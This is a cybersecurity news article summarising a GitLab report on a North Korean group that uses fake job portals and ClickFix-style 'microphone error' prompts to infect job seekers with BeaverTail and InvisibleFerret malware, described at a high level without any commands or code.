North Korean Hackers Target Job Seekers with Sophisticated “ClickFix” Scams
GitLab published a report detailing a fresh wave of attacks in which researcher Oliver Smith analyzed a shift in tactics by a North Korean cyber group employing the BeaverTail and InvisibleFerret malware families. The document describes a campaign in which the adversaries abandoned their prior developer-centric targeting and instead adopted ClickFix techniques to prey on job applicants in marketing, sales and retail — including roles advertised by Web3 companies.
BeaverTail, a JavaScript stealer known to act as a dropper for the Python backdoor InvisibleFerret, was first profiled in depth by Palo Alto Networks in late 2023. Since then, attackers have distributed it via fake npm packages and counterfeit video-conference applications such as FCCCall and FreeConference.
Operating under labels like Contagious Interview or Gwisin Gang and associated with the broader Lazarus umbrella, the group has been active since December 2022 and previously tended to cloak malicious tools with developer-focused lures.
The new surge observed in late May 2025 is notable because the threat actors used ClickFix-style traps to deliver compiled BeaverTail binaries, produced with packagers such as pkg and PyInstaller for Windows, macOS and Linux. Their vector was a bogus recruitment portal hosted on Vercel, where they posted vacancies for trader, sales and marketing roles and even solicited investments in a purported Web3 project.
Visitors were fingerprinted by public IP, then invited to undergo a video assessment; when a supposed “microphone error” occurred, victims were prompted to run an OS-specific command — a step that executed shell scripts or Visual Basic scripts and installed a lightweight BeaverTail build.
Observed modifications indicate rapid operational adaptation: the new build contains a simplified data-stealing module and targets only eight browser extensions instead of the prior twenty-two, with support for non-Chrome browsers removed. For the first time, attackers packaged Python dependencies for InvisibleFerret inside password-protected archives, a tactic that complicates analysis and evades rudimentary detection. The scant ancillary artifacts and the absence of elaborate social-engineering polishing suggest this may have been a probing operation rather than a fully scaled campaign.
This shift toward less technical candidates and compiled payloads reflects an intent to bypass environments lacking development tooling — operators continue to experiment with delivery chains to widen their reach and lower the barrier to compromise. Monitoring these vectors and vetting suspicious job postings on application-hosting platforms remain critical defenses against such schemes.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
